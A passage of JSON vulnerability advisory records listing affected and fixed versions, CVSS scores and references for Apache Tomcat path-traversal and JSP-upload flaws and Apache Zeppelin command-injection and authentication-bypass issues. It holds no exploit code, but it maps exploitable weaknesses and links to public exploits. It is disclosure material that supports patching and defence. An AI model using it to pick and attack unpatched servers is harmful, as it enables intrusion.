"10.1.45" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M11" }, { "fixed": "9.0.109" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55752" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/130d36d8492ef9e4eb22952c17c92423cb35fd06" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b5042622b8b78340ae65403c55dcb9c7416924df" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/fec06c610ed7466b401e29cc567a58aee5ed826a" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/n05kjcwyj1s45ovs8ll1qrrojhfb1tog" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.45" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.11" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.109" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/10/27/4" } ], "database_specific": { "cwe_ids": [ "CWE-23" ], "github_reviewed": true, "github_reviewed_at": "2025-10-28T17:55:41Z", "nvd_published_at": "2025-10-27T18:15:42Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xjgh-84hx-56c5", "published": "2022-05-14T01:07:15Z", "modified": "2025-10-22T19:25:42.954468Z", "aliases": [ "CVE-2017-12617" ], "summary": "Unrestricted Upload of File with Dangerous Type Apache Tomcat", "details": "When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.1" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.0M27", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.23" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.22", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0-RC1" }, { "fixed": "8.0.47" } ] } ], "versions": [ "8.0.0-RC1", "8.0.0-RC10", "8.0.0-RC3", "8.0.0-RC5", "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.5", "8.0.8", "8.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.0.46", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.82" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81" ], "database_specific": { "last_known_affected_version_range": "\u003c= 7.0.81", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.1" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.0M27", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.23" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.22", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0-RC1" }, { "fixed": "8.0.47" } ] } ], "versions": [ "8.0.0-RC1", "8.0.0-RC10", "8.0.0-RC3", "8.0.0-RC5", "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.5", "8.0.8", "8.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.0.46", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.82" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81" ], "database_specific": { "last_known_affected_version_range": "\u003c= 7.0.81", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12617" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/a9dd96046d7acb0357c6b7b9e6cc70d186fae663" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/74ad0e216c791454a318c1811300469eedc5c6f3" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/512a3c3aecdb52de092c6bacddd71b85c4feda06" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/506d862e7edfa991de198e0f2e4c4540830fa531" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/4cf7dab88282c8f3c92f0b961cdb0096e1d63e88" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/46dfedbc0523d7182be97f4244d7b6c942164485" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/327e8a6644e188764325a013aa2725a60f1b37e5" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/31e99502e2c602449a2f8835bd23ade772b77333" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/24aea94807f940ee44aa550378dc903289039ddd" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b577f9a7996b92b650b1649af3c3bae11c120db9" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b7e0435d17aba69f16ae9e8a78ad0f1565b552af" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/bbcbb749c75056a2781f37038d63e646fe972104" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/c177e9668d1278710bdb14c0eb8d2702b3655f5a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/cf0b37beb0622abdf24acc7110daf883f3fe4f95" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d5b170705d24c386d76038e5989045c89795c28c" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/e650cf1b83e441dbd3863f3f6b61c972cafce19e" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f1b85da754c4760787d68a99e839b50878140b57" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/fd52f8601170b91f9d7162510e54563e5bf6bdfe" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3080" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2017/11/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20171018-0002" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180117-0002" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K53173544" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbhf03812en_us" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbux03828en_us" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3665-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20171110171954/http://www.securityfocus.com/bid/100954" }, { "type": "WEB", "url": "https://web.archive.org/web/20201209024734/http://www.securitytracker.com/id/1039552" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-12617" }, { "type": "WEB", "url": "https://www.exploit-db.com/exploits/42966" }, { "type": "WEB", "url": "https://www.exploit-db.com/exploits/43008" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3081" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3113" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3114" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0268" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0269" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0270" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0271" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0275" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0465" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0466" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2939" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3fd341a604c4e9eab39e7eaabbbac39c30101a022acc11dd09d7ebcb%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3fd341a604c4e9eab39e7eaabbbac39c30101a022acc11dd09d7ebcb@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/100954" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1039552" } ], "database_specific": { "cwe_ids": [ "CWE-434" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T21:20:08Z", "nvd_published_at": "2017-10-04T01:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4qw8-pgpr-p9mq", "published": "2021-09-07T22:56:43Z", "modified": "2024-02-16T08:17:18.815800Z", "aliases": [ "CVE-2019-10095" ], "summary": "Bash command injection in Apache Zeppelin", "details": "bash command injection vulnerability in Apache Zeppelin allows an attacker to inject system commands into Spark interpreter settings. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.10.0" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3", "0.8.0", "0.8.1", "0.8.2", "0.9.0", "0.9.0-preview1", "0.9.0-preview2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-4qw8-pgpr-p9mq/GHSA-4qw8-pgpr-p9mq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10095" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd56389ba9cab30a6c976b9a4a6df0f85cbe8fba6a60a3cf6e3ba716b%40%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd56389ba9cab30a6c976b9a4a6df0f85cbe8fba6a60a3cf6e3ba716b@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf06e8423833b3daadc30c56a2ff47c48920864d5199476daa897208%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf06e8423833b3daadc30c56a2ff47c48920864d5199476daa897208%40%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf06e8423833b3daadc30c56a2ff47c48920864d5199476daa897208@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf06e8423833b3daadc30c56a2ff47c48920864d5199476daa897208@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-04" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/09/02/1" } ], "database_specific": { "cwe_ids": [ "CWE-77", "CWE-78" ], "github_reviewed": true, "github_reviewed_at": "2021-09-03T20:16:11Z", "nvd_published_at": "2021-09-02T17:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-87p2-cvhq-q4mv", "published": "2021-09-07T22:56:56Z", "modified": "2024-02-16T08:20:33.718960Z", "aliases": [ "CVE-2020-13929" ], "summary": "Authentication bypass in Apache Zeppelin", "details": "Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin authentication mechanism to act as another user. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.10.0" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3", "0.8.0", "0.8.1", "0.8.2", "0.9.0", "0.9.0-preview1", "0.9.0-preview2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-87p2-cvhq-q4mv/GHSA-87p2-cvhq-q4mv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13929" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028%40%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": 